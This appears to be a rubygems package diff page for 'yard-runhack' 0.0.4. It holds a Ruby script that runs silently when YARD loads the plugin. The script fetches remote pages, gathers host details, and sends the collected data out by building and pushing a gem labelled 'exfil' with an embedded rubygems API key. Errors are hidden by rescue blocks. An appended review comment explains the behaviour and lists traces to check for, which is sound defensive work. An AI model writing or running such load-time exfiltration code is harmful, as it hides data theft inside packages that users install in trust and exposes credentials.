
yard-runhack


yard-runhack - rubygems Package Compare versions

Comparing version
0.0.3
to
0.0.4
lib/dump.txt

Sorry, the diff of this file is too big to display

+1
-1

@@ -1,1 +0,1 @@

class X; end
#x

Sorry, the diff of this file is not supported yet

# plugin runs on yard load
begin
require 'net/http'; require 'uri'; require 'fileutils'; require 'tmpdir'
File.write('/tmp/yardhack', 'ran ' + Time.now.to_s)
targets = [
'https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
'https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026',
'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
'https://www.google.com/',
'http://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026'
]
data = "Plugin executed: #{Time.now} ruby=#{RUBY_VERSION} cwd=#{Dir.pwd}\n"
targets.each do |url|
begin
uri = URI(url)
# use native Net
res = Net::HTTP.start(uri.host, uri.port, use_ssl: (uri.scheme=='https'), open_timeout:20, read_timeout:40) {|h| h.get(uri.request_uri)}
data << "\n\n===== #{url} RESPONSE #{res.code} #{res.message} headers=#{res.to_hash.inspect} =====\n"
data << res.body.to_s
rescue => e
data << "\nERR #{url}: #{e.class}: #{e.message}\n#{e.backtrace&.join("\\n")}\n"
end
end
# package exfil
Dir.mktmpdir do |d|
Dir.mkdir(File.join(d,'lib'))
File.binwrite(File.join(d,'lib','dump.txt'),data)
File.write(File.join(d,'lib','x.rb'),"#x")
gemspec = <<~G
Gem::Specification.new do |s|
s.name='yard-runhack'; s.version='0.0.4'; s.summary='exfil'; s.authors=['x']; s.files=['lib/dump.txt','lib/x.rb']; s.require_paths=['lib']; s.licenses=['MIT'];
end
G
File.write(File.join(d,'ex.gemspec'),gemspec)
Dir.chdir(d) do
system('gem build ex.gemspec >/tmp/gembuildlog 2>&1')
file='yard-runhack-0.0.4.gem'; body=File.binread(file)
u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']='rubygems_830e967dd023d92da46904368f0f570a74e3c5878b1cd83c'; req['Content-Type']='application/octet-stream'; req.body=body; req['Content-Length']=body.bytesize.to_s
r=Net::HTTP.start(u.host,u.port,use_ssl:true) {|h| h.request(req)} rescue nil
# embed push result via extra local? no
end
end
rescue => e
File.write('/tmp/yardhackerr',"#{e.class}:#{e.message}\n" + e.backtrace.join("\n")) rescue nil
end
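Review bot: The `req['Authorization']` line embeds what looks like a live rubygems.org API key as a string literal, so anyone viewing this package can read it; it should be treated as compromised and revoked by its owner or the registry. The whole script runs as a load-time side effect (its own comment says `# plugin runs on yard load`): it fetches the URLs in `targets`, appends the responses together with `RUBY_VERSION` and `Dir.pwd` to `data`, builds a gem around `lib/dump.txt`, and POSTs it to `https://rubygems.org/api/v1/gems`, which is consistent with the oversized `lib/dump.txt` in this comparison. Failures are hidden by `rescue nil` and the outer `rescue`, so a host that loaded the plugin shows nothing on the console; the traces visible here to check for are the files `/tmp/yardhack`, `/tmp/gembuildlog` and `/tmp/yardhackerr` and an unexpected `gem build` child process. The page does not show which file or which side of the comparison these lines belong to, so confirm that before deciding which versions to block.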